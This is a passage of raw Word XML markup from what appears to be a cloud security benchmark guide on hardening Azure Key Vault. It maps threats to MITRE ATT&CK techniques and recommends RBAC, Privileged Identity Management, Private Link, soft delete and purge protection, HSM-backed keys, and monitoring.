        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3112E1" w14:textId="113B0623" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C42987" w14:textId="7120F4A0" w:rsidR="00FD39AD" w:rsidRDefault="00FD39AD" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD39AD">
        <w:t>unprotected credentials / credential stores (T1552 / T1555) obtained through misconfigured vault role or network policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3086FB3F" w14:textId="06A6409D" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41638F3E" w14:textId="126C6124" w:rsidR="00FD39AD" w:rsidRDefault="00FD39AD" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD39AD">
        <w:t>adversary</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD39AD">
        <w:t xml:space="preserve">-in-the-middle (T1557) capturing vault-bound traffic for key/cert </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FD39AD">
        <w:t>interception, or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD39AD">
        <w:t xml:space="preserve"> weaken encryption (T1600) replacing strong keys with attacker-controlled material.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E405EAB" w14:textId="6FB5E529" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31507D6A" w14:textId="5C1877D8" w:rsidR="00FD39AD" w:rsidRDefault="00FD39AD" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD39AD">
        <w:t>valid accounts (T1078) exploiting over-broad vault operator roles to enumerate and alter secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203193C4" w14:textId="2E12D84B" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EE2E62" w14:textId="47649382" w:rsidR="00FD39AD" w:rsidRDefault="00FD39AD" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="387"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FD39AD">
        <w:t>data destruction / inhibit recovery (T1485 / T1490) performing destructive purge sequences that prevent restoration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417033D7" w14:textId="58F280DA" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00E64F30">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-8.1: Implement access controls for Key Vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC6213F" w14:textId="63377438" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Protect the cryptographic foundation of your infrastructure by enforcing strict identity-based access controls that prevent unauthorized key access, limit administrative privileges to justified time windows, and eliminate credential storage through managed identities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCB641F" w14:textId="5628A8EB" w:rsidR="00E64F30" w:rsidRDefault="00E64F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Implement RBAC and separation of duties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F30C1BB" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement Azure RBAC for Key Vault to enforce </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>least-privilege</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8515B9" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>For Azure Key Vault Managed HSM: Use local RBAC at the individual key, secret, and certificate level with built-in roles (Managed HSM Crypto Officer, Crypto User, Crypto Auditor).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE8C42" w14:textId="489F3E89" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>For Azure Key Vault Standard/Premium: Create dedicated vaults per application or environment to enforce logical separation and assign RBAC roles (Key Vault Administrator, Secrets Officer, Certificate Officer) with application-specific scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D1292B" w14:textId="77F27784" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Enforce separation of duties: Separate roles for key management (who can create/rotate keys) from cryptographic operations (who can use keys for encrypt/decrypt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C0A0CA" w14:textId="36258DE9" w:rsidR="00E64F30" w:rsidRDefault="00E64F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Use managed identities and JIT access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F632F88" w14:textId="65FD8FB9" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:lastRenderedPageBreak/>
        <w:t>Use managed identities for Azure resources (App Services, VMs, Azure Functions, etc.) to access Key Vault instead of storing credentials in application code or configuration files. Managed identities eliminate credential storage and rotation complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627CB817" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Implement Microsoft Entra Privileged Identity Management (PIM) for just-in-time administrative access to Key Vault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AF29E3" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Configure eligible assignments for Key Vault Administrator role (not permanent assignments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE6DA03" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Require justification, MFA, and approval for activation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324651D3" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>maximum activation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> duration (e.g., 8 hours).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770CA31B" w14:textId="4EBDCFFD" w:rsidR="00E64F30" w:rsidRPr="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Conduct regular access reviews to revoke unnecessary standing privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A903BBC" w14:textId="77777777" w:rsidR="000737AC" w:rsidRDefault="000737AC" w:rsidP="000737AC"/>
    <w:p w14:paraId="09488D20" w14:textId="2BCB40A0" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="00E64F30">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-8.2: Harden Key Vault network security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB4AAB4" w14:textId="5747AFC7" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Eliminate internet-facing attack surfaces by routing all Key Vault access through private endpoints within your virtual networks, preventing credential stuffing, brute-force attempts, and reconnaissance from external threat actors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570B2531" w14:textId="0CF675F0" w:rsidR="00E64F30" w:rsidRDefault="00E64F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Deploy Private Link and configure firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2393B7AE" w14:textId="57E6CBBA" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t xml:space="preserve">Secure network access to Azure Key Vault using Azure Private Link to establish private connectivity from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E64F30">
        <w:t>VNets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E64F30">
        <w:t xml:space="preserve"> without exposing Key Vault to the public internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BD60F7" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configure Key Vault firewall to restrict access to specific IP ranges or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VNets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for scenarios where Private Link is not feasible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3DB64E" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Disable public access where possible (Key Vault only accessible via private endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B74E39" w14:textId="4C878841" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>If public access is required (e.g., for CI/CD pipelines), allow access from selected networks only with narrow IP allowlists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4046FE9B" w14:textId="482AD70B" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t xml:space="preserve">Create and link private DNS zones (e.g., privatelink.vaultcore.azure.net) to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E64F30">
        <w:t>VNets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E64F30">
        <w:t xml:space="preserve"> to ensure proper DNS resolution for private endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788BFE51" w14:textId="5885E4D7" w:rsidR="00AE0408" w:rsidRPr="00AE0408" w:rsidRDefault="00AE0408" w:rsidP="00AE0408">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE0408">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-8.3: Enable Key Vault protection and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45120A1A" w14:textId="4E03C06C" w:rsidR="00E64F30" w:rsidRDefault="00E64F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Enable soft delete and purge protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76562155" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Enable soft delete and purge protection on all Azure Key Vaults to prevent accidental or malicious deletion of keys, secrets, and certificates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149BC54" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Soft delete allows recovery within a retention period (default: 90 days).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CAC57E" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Purge protection prevents permanent deletion during retention period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D9A774" w14:textId="520770F4" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Enforce these settings with Azure Policy using built-in policies: "Key vaults should have soft delete enabled" and "Key vaults should have purge protection enabled" (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deployIfNotExists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> effect)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635DCAED" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRPr="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Implement key lifecycle policies to avoid cryptographic erasure of data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203EC602" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRPr="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Before purging encrypted data, verify that encryption keys are retained for the required data retention period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233F0163" w14:textId="77777777" w:rsidR="00E64F30" w:rsidRPr="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t xml:space="preserve">When decommissioning keys, use disable operation instead of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E64F30">
        <w:t>delete</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E64F30">
        <w:t xml:space="preserve"> to prevent accidental data loss while maintaining key metadata for audit purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E4DFF" w14:textId="4324F175" w:rsidR="00E64F30" w:rsidRDefault="00E64F30" w:rsidP="004B171D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E64F30">
        <w:t>Create and test Key Vault backup procedures for disaster recovery scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0091A7C2" w14:textId="603C2228" w:rsidR="009B0BE6" w:rsidRDefault="009B0BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B0BE6">
        <w:t>Use HSM-backed keys and BYOK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258D6EA" w14:textId="77777777" w:rsidR="009B0BE6" w:rsidRDefault="009B0BE6" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Use HSM-backed keys for production workloads requiring strong cryptographic protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2539870E" w14:textId="77777777" w:rsidR="009B0BE6" w:rsidRDefault="009B0BE6" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Azure Key Vault Premium: RSA-HSM and EC-HSM keys protected by FIPS 140-2 Level 2 validated HSMs (shared multi-tenant).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D83571" w14:textId="2AFEF8D5" w:rsidR="009B0BE6" w:rsidRDefault="009B0BE6" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Azure Key Vault Managed HSM: RSA-HSM and EC-HSM keys protected by FIPS 140-3 Level 3 validated HSMs (dedicated single-tenant pools).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D6200" w14:textId="58FF1DB1" w:rsidR="009B0BE6" w:rsidRDefault="009B0BE6" w:rsidP="002B1003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009B0BE6">
        <w:t>For Bring Your Own Key (BYOK) scenarios, generate keys in on-premises FIPS 140-2 Level 2+ HSMs and use the BYOK transfer key mechanism to securely import keys into Azure Key Vault, maintaining cryptographic proof of key origin and custody.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BC6BEA" w14:textId="552FAA43" w:rsidR="009B0BE6" w:rsidRDefault="009B0BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B0BE6">
        <w:t>Enable monitoring and threat detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4005D193" w14:textId="37DE9837" w:rsidR="009B0BE6" w:rsidRDefault="009B0BE6" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009B0BE6">
        <w:t>Enable diagnostic logging for Azure Key Vault and route logs to Azure Monitor, Log Analytics, or Microsoft Sentinel to capture all management plane and data plane operations. Monitor for suspicious activities including unusual key access patterns, failed authentication attempts, and administrative changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC4996A" w14:textId="01DBD39F" w:rsidR="009B0BE6" w:rsidRDefault="009B0BE6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009B0BE6">
        <w:t>Enable Microsoft Defender for Key Vault to detect anomalous access patterns, unusual key operations, and potential threats such as credential abuse, suspicious key retrievals, or administrative anomalies. Integrate Defender for Key Vault alerts with incident response workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150A45B" w14:textId="68F86A86" w:rsidR="00875D4A" w:rsidRDefault="00875D4A" w:rsidP="00080172">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00875D4A">
        <w:t>Integrate Key Vault logs with Microsoft Sentinel to create analytics rules for detecting anomalies such as unusual regional access, potential brute force attempts, or suspicious administrative operations. Implement automated response playbooks to isolate compromised identities and notify security teams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D017133" w14:textId="77777777" w:rsidR="00AE0408" w:rsidRDefault="00AE0408" w:rsidP="00AE0408"/>
    <w:p w14:paraId="6E71DB28" w14:textId="63595332" w:rsidR="00AE0408" w:rsidRPr="0083059A" w:rsidRDefault="00AE0408" w:rsidP="00AE0408">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc242449512"/>
      <w:r w:rsidRPr="0083059A">
        <w:lastRenderedPageBreak/>
        <w:t>Asset Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="5B67E74E" w14:textId="2C43EA03" w:rsidR="00AE0408" w:rsidRDefault="00AE0408" w:rsidP="00AE0408">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc242449513"/>
      <w:r w:rsidRPr="00AE0408">
        <w:t>Asset inventory and visibility</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="5F1203CB" w14:textId="59446325" w:rsidR="00AE0408" w:rsidRPr="00AE0408" w:rsidRDefault="00AE0408" w:rsidP="00AE0408">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
